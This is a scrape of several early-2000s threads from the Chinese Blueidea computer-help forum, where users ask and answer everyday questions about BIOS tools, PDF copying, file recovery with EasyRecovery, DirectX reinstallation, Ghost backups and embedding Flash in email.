 发表于 2002-02-21 21:56:20 按此观看BIGBUG的个人资料 按此发邮件给BIGBUG BIGBUG 的 oicq 是9718783,查看 9718783 的资料 发送悄悄话给BIGBUG 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看BIGBUG的IP
sohu啊sina啊之类的网站去找找看
你不会用搜索引擎吗？

等我想想再签
过雪无痕

高级用户
积分：223
发帖：65
来自：
注册：2001-12-03
 发表于 2002-02-21 22:04:16 按此观看过雪无痕的个人资料 按此发邮件给过雪无痕 访问过雪无痕的主页 过雪无痕 的 oicq 是35865183,查看 35865183 的资料 发送悄悄话给过雪无痕 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看过雪无痕的IP
那我的BIOS是AWDFLASH刷新用。那我的BIOS属于AWARD吗？

虽然我很笨！但是我好学。望多多指教！谢谢：） http://go3.163.com/tomjon
过雪无痕

高级用户
积分：223
发帖：65
来自：
注册：2001-12-03
 发表于 2002-02-21 22:12:10 按此观看过雪无痕的个人资料 按此发邮件给过雪无痕 访问过雪无痕的主页 过雪无痕 的 oicq 是35865183,查看 35865183 的资料 发送悄悄话给过雪无痕 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看过雪无痕的IP
我的BIOS能用CBROM改吗

虽然我很笨！但是我好学。望多多指教！谢谢：） http://go3.163.com/tomjon
过雪无痕

高级用户
积分：223
发帖：65
来自：
注册：2001-12-03
 发表于 2002-02-21 22:16:11 按此观看过雪无痕的个人资料 按此发邮件给过雪无痕 访问过雪无痕的主页 过雪无痕 的 oicq 是35865183,查看 35865183 的资料 发送悄悄话给过雪无痕 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看过雪无痕的IP
对了。我下载的驱动里他给我提供的LOAD.EXE是干什么用的。

虽然我很笨！但是我好学。望多多指教！谢谢：） http://go3.163.com/tomjon
上一贴 | 下一贴
快速回复 主题：SOS
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]
显示签名 禁止笑脸转换

管理选项： 关闭主题 | 置于顶部 | 移动/归档 | 删除主题

跳转到:

dreamweaver MX 功能探索


我该怎么办？ - 经 典 论 坛

计算机技术
我该怎么办？

上一贴 | 下一贴
发表人 主题: 我该怎么办？
zhengj

初级用户
积分：3
发帖：1
来自：
注册：2001-12-05
 发表于 2002-02-27 11:22:03 按此观看zhengj的个人资料 按此发邮件给zhengj 收藏该主题供以后查看 发送悄悄话给zhengj 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看zhengj的IP
怎么把word（.doc）文件转换Acrobat Reader（.pdf）文件。救救我。我的EMAIL:zupuiedc@mail.hz.zj.cn
cancan

质子
积分：209
发帖：145
来自：shanghai
注册：2001-04-06
 发表于 2002-02-27 12:20:32 按此观看cancan的个人资料 按此发邮件给cancan 访问cancan的主页 cancan 的 oicq 是44787750,查看 44787750 的资料 发送悄悄话给cancan 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看cancan的IP
使用Acrobat阅读器进行文本和图形的复制<来自the9.com>

Adobe Acrobat是一套丰富的应用软件,它包括Acrobat阅读器、Acrobat 4.0、Acrobat Distiller 、Acrobat Catalog、Acrobat Search、Acrobat Scan和Acrobat Capture等，它提供了一种传递大量信息的方式，能为用户提供文档的组织、显示、打印等众多功能，支持多平台应用，其PDF文件是世界性的电子文件格式标准，能保留来自任何源文件的所有字体、格式、颜色和图形，与生成源文件的应用程序及平台无关。

Acrobat阅读器(Acrobat reader)是Adobe Acrobat产品的一个组成部分，可以从Adobe系统的网站免费得到。由于Acrobat阅读器是免费的软件，它在功能上有局限性。用Acrobat阅读器不能编辑或保存PDF文件。它仅允许在屏幕上观看，或用打印机打印PDF文件。如果看文件菜单，会发现没有"保存"命令。但是，我们仍然可以通过在阅读器中选择文本和图形，从而达到进行复制的目的。用Acrobat阅读器复制文本

首先你必须要有一个Microsoft Word或者其它文字处理软件，如果没有文字处理软件，也可以用排版软件或者文本编辑器。在进行文本选择时可以通过Edit-Select ALL（编辑/全选）菜单功能进行，也可以通过文本选择工具进行。文本选择工具位于阅读器的控制栏中，用鼠标点击此工具将会出现另外两种选择工具：栏目选择工具和图形选择工具。

1．启动阅读器和Microsoft Word：如果内存不足以使两个软件同时运行，就只启动阅读器。
2．选择File-Open（文件/打开），打开选择的PDF文件。
3．找到希望复制大量文字的页。
4．用鼠标点击文本选择工具，通过在一行文字上拖动鼠标，或者将鼠标向下拖动过多行文字，就可以选定多个单词，或一段文字。如果选择Edit-Select ALL菜单功能，就可以选中该PDF文件中的所有文字内容。
5．选择Edit-Copy（编辑/拷贝）：文字将被复制到剪贴板中。
6．打开文字处理程序。
7．选择Edit-Paste（编辑/粘贴）：把剪贴板中的文字粘贴进来。
这样就完成了文本的复制。

用Acrobat阅读器复制图形

在Acrobat中选择图形的操作与使用文本选择工具选择文本相似。图形选择工具的作用类似图形转储功能。可以通过鼠标划定区域来选择要捕捉的屏幕内容。

要对所选内容进行复制，可以使用与复制文本相同的方法：选择Edit-Copy（编辑/拷贝），将被选择的图形复制到系统剪贴板。复制到剪贴板的文件将是系统自己的文件格式。在Windows中，剪贴板中的文件格式是Windows元文件(WMF)；在Macintosh中，文件格式是PICT。复制的图形可以用图形编辑程序如 Adobe Photoshop进行修改。

由于在Acrobat阅读器中选择图形时，选定图形的分辨率都不能高于72像素/英寸（ppi），所以在Acrobat阅读器中进行图形的复制与粘贴仅限于对屏幕显示内容的编辑。对于任何种类的打印设备或高精度数字处理设备，应该返回原始文件，并在Acrobat的编辑程序中打开原始图形。

如果你在执行上述步骤时，发现根本无法使用文本、图形选择工具，那么你就应该检查一下该PDF文件被授权时规定的安全信息，来解释遇到的这个问题。选择File-Document Info-security（文件/文档信息/安全信息），察看Selecting Text and Graphics(选定文本和图形)是否被禁止。如果没有，那么问题就是和Acrobat阅读器有关了。如果你想对PDF文件进行编辑，那么就只好去购买Acrobat 4.0了。

Acrobat程序在全世界的使用是非常广泛的。在整个星球上，任何有计算机系统的地方就有Acrobat的使用者--总人数已经超过5千万。所有Acrobat组件的使用都能得到联机帮助。如果要获得更多的信息，可以在Acrobat阅读器中通过点击控制栏中的工具、选择File-Adobe Online，或者选择Help-Adobe on the web（帮助/网上Adobe），从而进入Adobe的网站。

思 者 无 疆
上一贴 | 下一贴
快速回复 主题：我该怎么办？
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


紧急求助！恢复硬盘文件！！！ - 经 典 论 坛

dreamweaver MX 功能探索

计算机技术
紧急求助！恢复硬盘文件！！！

上一贴 | 下一贴
发表人 主题: 紧急求助！恢复硬盘文件！！！
不知道

终级用户
积分：682
发帖：201
来自：
注册：2001-08-17
 发表于 2002-03-08 16:18:41 按此观看不知道的个人资料 按此发邮件给不知道 收藏该主题供以后查看 发送悄悄话给不知道 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看不知道的IP
我硬盘上一个放有大量下载文件的目录不幸被误删除了。请提供一个在WIN2K下使用的恢复被删文件的工具。最好有下载地址！谢了！！！

知之为知之，不知为不知！！
CrazyParty

群山之巅
积分：2491
发帖：922
来自：温州
注册：2000-10-14
 发表于 2002-03-08 16:33:27 按此观看CrazyParty的个人资料 按此发邮件给CrazyParty 发送悄悄话给CrazyParty 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看CrazyParty的IP
EasyRecovery Professional
一般大点的下载站点都有。

这是一个0和1组成的世界，是她的世界，与我的世界截然不同，她的名字叫……
不知道

终级用户
积分：682
发帖：201
来自：
注册：2001-08-17
 发表于 2002-03-08 17:13:34 按此观看不知道的个人资料 按此发邮件给不知道 发送悄悄话给不知道 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看不知道的IP
我找了好几个地方都下不了！！

知之为知之，不知为不知！！
不知道

终级用户
积分：682
发帖：201
来自：
注册：2001-08-17
 发表于 2002-03-08 17:29:10 按此观看不知道的个人资料 按此发邮件给不知道 发送悄悄话给不知道 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看不知道的IP
我找了好几个地方都下不了！！

知之为知之，不知为不知！！
Cinkey

我和我追逐的梦
积分：1138
发帖：2440
来自：杭州
注册：2001-06-21
 发表于 2002-03-08 20:41:09 按此观看Cinkey的个人资料 按此发邮件给Cinkey 访问Cinkey的主页 Cinkey 的 oicq 是23516844,查看 23516844 的资料 发送悄悄话给Cinkey 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看Cinkey的IP
用http://www.google.com

 悠 長 假 期   |  反恐联盟  |  CS服务器状态查看
Cinkey

我和我追逐的梦
积分：1138
发帖：2440
来自：杭州
注册：2001-06-21
 发表于 2002-03-08 22:33:44 按此观看Cinkey的个人资料 按此发邮件给Cinkey 访问Cinkey的主页 Cinkey 的 oicq 是23516844,查看 23516844 的资料 发送悄悄话给Cinkey 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看Cinkey的IP
http://www.51soft.com/soft/soft.asp?softID=7870
应该是这个了吧....

 悠 長 假 期   |  反恐联盟  |  CS服务器状态查看
不知道

终级用户
积分：682
发帖：201
来自：
注册：2001-08-17
 发表于 2002-03-09 01:15:14 按此观看不知道的个人资料 按此发邮件给不知道 发送悄悄话给不知道 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看不知道的IP
谢谢各位帮助！！

我已经用EasyRecovery恢复了23个子目录1000多个文件，绝大部分都可以正常使用，包括自.ZIP，.RAR文件及安装文件。这个软件真的很好用！当然，最好是不要犯这种错误！

千万不要在心情烦燥的时候整理硬盘，以免发生误操作。
误删文件后，不要对这个驱动器进行写操作，把损失减到最少。
尽量不要用中文文件名来保存文件，在恢复文件时会带来麻烦。这次本来可以恢复更多的文件，就是在保存一个中文名的文件时出错，程序终止了。我不知道这种错误是否能避免？
恢复文件一定要保存到另外一个驱动器上。

知之为知之，不知为不知！！
上一贴 | 下一贴
快速回复 主题：紧急求助！恢复硬盘文件！！！
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


求救！ - 经 典 论 坛

计算机技术
求救！

上一贴 | 下一贴
发表人 | 主题: 求救！
dwd999 初级用户 积分：54 发帖：16 来自： 注册：2002-02-02 | 发表于 2002-03-11 04:14:38 按此观看dwd999的个人资料 按此发邮件给dwd999 收藏该主题供以后查看 发送悄悄话给dwd999 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看dwd999的IP 请问*.Sit格式的文件用什么打开？
2smile 活着就好 积分：1811 发帖：2105 来自：SD 注册：2001-05-13 | 发表于 2002-03-11 08:58:07 按此观看2smile的个人资料 按此发邮件给2smile 访问2smile的主页 发送悄悄话给2smile 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看2smile的IP StuffIt 想见不如怀念? thinktip.com msn: thinktip@hotmail.com icq: 98885338
上一贴 | 下一贴
快速回复 主题：求救！
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]
显示签名 禁止笑脸转换

管理选项： 关闭主题 | 置于顶部 | 移动/归档 | 删除主题

跳转到:

dreamweaver MX 功能探索


怎样重装Direct8.0？ - 经 典 论 坛

经典论坛 PS版与艺设版 联合举办 『设计四连击』 设计接龙

计算机技术
怎样重装Direct8.0？

上一贴 | 下一贴
发表人 | 主题: 怎样重装Direct8.0？
sofire 初级用户 积分：37 发帖：10 来自： 注册：2002-03-09 | 发表于 2002-03-09 09:42:08 按此观看sofire的个人资料 按此发邮件给sofire 收藏该主题供以后查看 发送悄悄话给sofire 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看sofire的IP 不要告诉偶重装win98，那样偶就没心情去快乐的喝酸奶了。 i love you,my red red rose!
Fly Developer 积分：4146 发帖：1028 来自： 注册：2001-10-31 | 发表于 2002-03-09 10:24:58 按此观看Fly的个人资料 按此发邮件给Fly Fly 的 oicq 是7969660,查看 7969660 的资料 发送悄悄话给Fly 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看Fly的IP 去华军找找第三方软件，可以卸载DX的，先卸再装 我的虚荣心是用十句话说出别人用一本书讲出的东西和别人用一本书没有讲出的东西. ----尼采
yunbin 经典强盗 现任版主 积分：2397 发帖：1033 来自：火星 注册：2001-09-27 | 发表于 2002-03-09 11:10:50 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP 一:找专用工具卸载 二:打开注册表编辑器。 [HKEY_LOCAL_MACHINE\Software\Microsoft\DirectX] "Version"="4.08.00.0400" 将4.08.00.0400改为4.00.00.0000再装DX7就可以了 A man can succeed at almost anything for which he has unlimited enthusiasm. Blueidea Web Team Moderator Of Computer Technology Forum
li88yi 终级用户 积分：911 发帖：439 来自：PX.JX.CN 注册：2000-08-25 | 发表于 2002-03-09 15:03:31 按此观看li88yi的个人资料 按此发邮件给li88yi li88yi 的 oicq 是762429,查看 762429 的资料 发送悄悄话给li88yi 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看li88yi的IP DirectX Uninstaller 卸载 无可救药....
barry 终级用户 积分：731 发帖：371 来自：上海 注册：2001-01-29 | 发表于 2002-03-09 16:33:05 按此观看barry的个人资料 按此发邮件给barry 访问barry的主页 barry 的 oicq 是24319347,查看 24319347 的资料 发送悄悄话给barry 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看barry的IP 版主的第二种方法最简单 A bosom friend afar brings a distant land near. 海内存知己,天涯若比邻
sony 终级用户 积分：1222 发帖：329 来自：浙江省 注册：2001-10-05 | 发表于 2002-03-09 19:55:11 按此观看sony的个人资料 按此发邮件给sony sony 的 oicq 是27869008,查看 27869008 的资料 发送悄悄话给sony 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看sony的IP 用优化大师 许多夜晚，你轻柔地依偎在我的身上，用纤纤秀手触摸我身上娇嫩的地方，用小巧细嘴吸出我珍贵的体液，直到满足十分才肯松口离开，唉，这该死的蚊子。
F鹰 超级用户 积分：313 发帖：94 来自： 注册：2002-02-27 | 发表于 2002-03-11 01:56:15 按此观看F鹰的个人资料 按此发邮件给F鹰 F鹰 的 oicq 是105454121,查看 105454121 的资料 发送悄悄话给F鹰 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看F鹰的IP 呵呵装DX8.1就行了啊 =BULEIDEA=SOS
上一贴 | 下一贴
快速回复 主题：怎样重装Direct8.0？
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


有什么工具能够 抓下超出一屏的页面。。。 - 经 典 论 坛

计算机技术
有什么工具能够 抓下超出一屏的页面。。。

上一贴 | 下一贴
发表人 主题: 有什么工具能够 抓下超出一屏的页面。。。
birdbird

初级用户
积分：132
发帖：44
来自：
注册：2001-12-06
 发表于 2001-12-17 10:15:26 按此观看birdbird的个人资料 该用户不允许显示它的电子邮件 收藏该主题供以后查看 发送悄悄话给birdbird 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看birdbird的IP
一般的抓图工具只能抓下最多全屏的图片，如果页面出现滚屏，用什么工具能够把整个页面截下来。

我是菜鸟可这不是过错我也不想当菜鸟我不想做菜鸟我想飞...
ADSL

终级用户
积分：3031
发帖：686
来自：华尔街
注册：2001-03-06
 发表于 2001-12-17 11:37:55 按此观看ADSL的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给ADSL 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ADSL的IP
HyperSnap-DX 4

好运永相随
birdbird

初级用户
积分：132
发帖：44
来自：
注册：2001-12-06
 发表于 2001-12-17 13:51:20 按此观看birdbird的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给birdbird 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看birdbird的IP
我试过的，HyperSnap-DX 4也只能抓一屏之内的东西，若页面超出了一屏的长度，就不行了。
这个问题长久以来困扰着我，一直没有找到答案，真的没有解决办法 吗？

我是菜鸟可这不是过错我也不想当菜鸟我不想做菜鸟我想飞...
tntst

高级用户
积分：249
发帖：213
来自：广州
注册：2000-07-23
 发表于 2001-12-17 13:58:13 按此观看tntst的个人资料 按此发邮件给tntst tntst 的 oicq 是10406476,查看 10406476 的资料 发送悄悄话给tntst 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看tntst的IP
hypersnap

Capture－＞Capture Settings，在Auto Scroll...之前打上勾！

***>> TNTST <<***
-----------------------------------
投稿信箱：tntst@pconline.com.cn
网址： http://www.pconline.com.cn/pcedu
birdbird

初级用户
积分：132
发帖：44
来自：
注册：2001-12-06
 发表于 2001-12-17 14:58:55 按此观看birdbird的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给birdbird 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看birdbird的IP
OK!
太感谢了!
还是好人多啊，我好感动，55555......

我是菜鸟可这不是过错我也不想当菜鸟我不想做菜鸟我想飞...
上一贴 | 下一贴
快速回复 主题：有什么工具能够 抓下超出一屏的页面。。。
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


如何用GHOST给WIN98备份。 - 经 典 论 坛

计算机技术
如何用GHOST给WIN98备份。

上一贴 | 下一贴
发表人 主题: 如何用GHOST给WIN98备份。
毛毛1985

初级用户
积分：57
发帖：16
来自：沈阳市
注册：2002-02-01
 发表于 2002-02-01 19:03:05 按此观看毛毛1985的个人资料 按此发邮件给毛毛1985 毛毛1985 的 oicq 是95141901,查看 95141901 的资料 收藏该主题供以后查看 发送悄悄话给毛毛1985 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看毛毛1985的IP
大家好：
我只是个新手，我是一个中专生，我是学计算机的，但是我对计算机的很多不是很了解，所以在这里我想找一些对计算机有兴趣的人做朋友。
现在我遇上了一些问题，我想知道怎样用GHOST给WIN98备份，毛毛在这里谢谢在家了，我的E－MAIL是xuhao402@sina.com请大家帮助我，谢谢。
毛毛
2002年2月1日

我是一个初学者，请大家指教好吗？
不知道

终级用户
积分：682
发帖：201
来自：
注册：2001-08-17
 发表于 2002-02-02 00:08:42 按此观看不知道的个人资料 按此发邮件给不知道 发送悄悄话给不知道 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看不知道的IP
(转）
在本地PC上对于硬盘进行操作,这是家庭PC备份的常用方法,包括disk(硬盘)、partition(分区)、check(检查)三项功能。

    一、在disk中,可以选择to disk(硬盘对拷)、to image(硬盘建立备份)、from im age(从备份文件恢复)。

    1．选择to disk，将会显示本地机上所有硬盘的情况,如容量、柱面数、扇区等等。先后选择源盘和目标盘, 点击ok后,开始硬盘对拷,同时显示复制的进程。

    2．选择to image，将会为本地硬盘生成备份文件，如图2所示。采用这种方法可以为硬盘做好备份。选择生成备份文件的路径,然后为备份文件命名,按回车键后,会询问采用何种方式备份(不压缩、快速压缩、最大压缩)。如果硬盘空间比较紧张,建议使用最大压缩,反之,使用前两种可以提高备份的速度。如果备份系统,可以将备份文件保存在CD -ROM上,这样便于恢复。

    3．选择from image：选择备份文件用来恢复系统或者建立操作系统。首先,选取备份文件,然后选取要恢复的硬盘,点“ok”后,开始恢复。

    二、在to partition中,可以选择to partition(分区对拷)、to image(生成备份文件)、from image(恢复分区)。

    1．选择to partition，将会显示本地硬盘的情况,选择要操作的硬盘并且点击,将显示此硬盘的所有分区，如图3所示。 选择一个分区作为源分区,这时,将会再次出现硬盘供选择，这时既可以复制到其他盘的分区,也可以覆盖本盘其他分区。

    2．to image的用法与硬盘的备份文件生成基本相同,在生成备份文件前,也会询问是否压缩备份文件,此时共有三个选项： no、fast、high,选择no不压缩备份文件；选择fast采用快速压缩,但是压缩比不高；选择high采用高比例压缩,但是速度较慢。

另外：Ghost的运行平台最好是在DOS下。

知之为知之，不知为不知！！
蓝色

管理员|蓝色
积分：13927
发帖：6011
来自：China
注册：2000-06-16
 发表于 2002-02-02 00:12:37 按此观看蓝色的个人资料 该用户不允许显示它的电子邮件 访问蓝色的主页 发送悄悄话给蓝色 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看蓝色的IP
重启进入 dos

进入ghost目录，运行ghost

选择菜单
from 分区 to image(映像)
选择c盘。回车，写上存盘的文件名

开始备份

注意，gohost一定不要和你要备份的区，在一个区。

其实可以看着英文一步步来，其英文非常的简单，如果你是学计算机的，我建议你少问多做。多实践。胆子大点，大不了格了重来。一万多的东西，怎么会说坏就坏呢

想当年。。我机器买回来，屁都不知道，就开箱子，第二天就练习 format c: 第三天就被逼请人上门修理，不过从那以后，再没有找过人来修，那时候还没有互联网，全是自己实践的。

我错了，以前我是死不承认，现在需要常常认错。
认错后，再听那掠过林梢的歌唱。

Blueidea Web Team
Team Leader

毛毛1985

初级用户
积分：57
发帖：16
来自：沈阳市
注册：2002-02-01
 发表于 2002-02-02 16:09:51 按此观看毛毛1985的个人资料 按此发邮件给毛毛1985 毛毛1985 的 oicq 是95141901,查看 95141901 的资料 发送悄悄话给毛毛1985 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看毛毛1985的IP
你好,谢谢你的帮助,我想和你做个朋友,好吗?
把你的E-MAIL给我好吗?
我好有什么问题好问你

我是一个初学者，请大家指教好吗？
mao

现任版主
积分：1694
发帖：691
来自：北京
注册：2000-07-23
 发表于 2002-02-03 03:40:42 按此观看mao的个人资料 按此发邮件给mao 访问mao的主页 mao 的 oicq 是20801171,查看 20801171 的资料 发送悄悄话给mao 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看mao的IP
那可是大名鼎鼎的蓝色阿!!

解决问题才有进步
解决问题才有进步
上一贴 | 下一贴
快速回复 主题：如何用GHOST给WIN98备份。
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]
显示签名 禁止笑脸转换

管理选项： 关闭主题 | 置于顶部 | 移动/归档 | 删除主题

跳转到:

dreamweaver MX 功能探索


foxmail是不是不支持hotmial - 经 典 论 坛

经典论坛 PS版与艺设版 联合举办 『设计四连击』 设计接龙

计算机技术
foxmail是不是不支持hotmial

上一贴 | 下一贴
发表人 | 主题: foxmail是不是不支持hotmial
火狐 初级用户 积分：135 发帖：42 来自：森林 注册：2001-06-15 | 发表于 2002-02-18 21:31:46 按此观看火狐的个人资料 该用户不允许显示它的电子邮件 收藏该主题供以后查看 发送悄悄话给火狐 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看火狐的IP 请问foxmail是不是不支持hotmial，我不能收的，outlook可以收 我的生命----为探索而存在！！！
ImHow 怎样 积分：2446 发帖：648 来自：::HowHome:: 注册：2002-01-16 | 发表于 2002-02-19 12:52:29 按此观看ImHow的个人资料 按此发邮件给ImHow 访问ImHow的主页 ImHow 的 oicq 是16407971,查看 16407971 的资料 发送悄悄话给ImHow 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ImHow的IP 是的，因为hotmail不支持pop协议，outlook使用http收取hotmail上的信 ::古落根门:: 唯有不断学习 才能不断进步
上一贴 | 下一贴
快速回复 主题：foxmail是不是不支持hotmial
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


紧急求助!我有个flash图片，想把它放在邮件里怎么样可以直 - 经 典 论 坛

计算机技术
紧急求助!我有个flash图片，想把它放在邮件里怎么样可以直

上一贴 | 下一贴
发表人 主题: 紧急求助!我有个flash图片，想把它放在邮件里怎么样可以直
arey

高级用户
积分：186
发帖：61
来自：
注册：2001-12-20
 发表于 2001-12-21 14:41:06 按此观看arey的个人资料 按此发邮件给arey arey 的 oicq 是15810000,查看 15810000 的资料 收藏该主题供以后查看 发送悄悄话给arey 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看arey的IP
我有个flash图片，想把它放在邮件里发给别人，怎么样可以直接显示出来，而不是打开附件？

我是一条美人鱼，游啊游啊游~~~~~~~
冷语

Fierce
现任版主
积分：14069
发帖：5375
来自：BeiJing
注册：2001-03-06
 发表于 2001-12-21 16:15:54 按此观看冷语的个人资料 按此发邮件给冷语 冷语 的 oicq 是6577192,查看 6577192 的资料 发送悄悄话给冷语 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看冷语的IP
选择发送html代码
<embed src=swf地址 width=xx height=xx>

[ Come As You Are ]

Blueidea Web Team
Moderator Of Flash forum

arey

高级用户
积分：186
发帖：61
来自：
注册：2001-12-20
 发表于 2001-12-21 18:35:39 按此观看arey的个人资料 按此发邮件给arey arey 的 oicq 是15810000,查看 15810000 的资料 发送悄悄话给arey 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看arey的IP
冷语，麻烦你写的详细点好吗？我问了很多人，他们都没法解决
请看http://www.blueidea.com/bbs/NewsDetail.asp?id=330286

[这消息被arey编辑过(编辑时间2001-12-21 23:48:51)]

我是一条美人鱼，游啊游啊游~~~~~~~
coffeecup

高级用户
积分：262
发帖：69
来自：
注册：2001-12-03
 发表于 2001-12-21 19:12:39 按此观看coffeecup的个人资料 按此发邮件给coffeecup 发送悄悄话给coffeecup 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看coffeecup的IP
arey在上个帖子中说
引用:
冷语，麻烦你写的详细点好吗？我问了很多人，他们都没法解决
请看http://www.blueidea.com/bbs/NewsDetail.asp?id=330286

这活前几天刚做过，虽然信件是可以编辑源码的，不过对展示flash没有，比如你的路径是桌面，可收信人桌面上面没有这个swf，所以他看不到。

我知道的就一个方法，你找个网上空间，在网上做好一个页面，在里面放上你的swf.然后打开新邮件，菜单中“邮件“/“新邮件使用“/"Web页“，弹出窗口输入你做的那个地址，发出去就可以了。当然有一个要求，对方必须在线的情况下打开你的信才能看到。看上去这方法有点傻，给别人一个地址不就结了，不过重要的是别人打开信看到一个动画，而不是写的http...感觉还是不一样的。（另外信里面最好别写自，因为很容易给flash挡住，要不你把flash做的下面点）ok,如果还有另外的方法可以做到被忘了告诉我。也许这是OE7.0要改进的目标，可以让flash和图片一样。

→→Coffee Cup ? nO Coffee CPU ! ←←
freedog

初级用户
积分：0
发帖：21
来自：
注册：2001-12-14
 发表于 2001-12-21 19:19:51 按此观看freedog的个人资料 按此发邮件给freedog freedog 的 oicq 是108336337,查看 108336337 的资料 发送悄悄话给freedog 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看freedog的IP
很简单！你把flash改为html源代码然后天道信件里面，按html格式发送！

I am a freedog！
arey

高级用户
积分：186
发帖：61
来自：
注册：2001-12-20
 发表于 2001-12-21 23:31:39 按此观看arey的个人资料 按此发邮件给arey arey 的 oicq 是15810000,查看 15810000 的资料 发送悄悄话给arey 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看arey的IP
coffeecup说得有道理，我试过了，是可以的。谢谢你的帮助！
<embed src=swf地址 width=xx height=xx>这样做我不太明白，能解释一下吗？

[这消息被arey编辑过(编辑时间2001-12-21 23:32:02)]

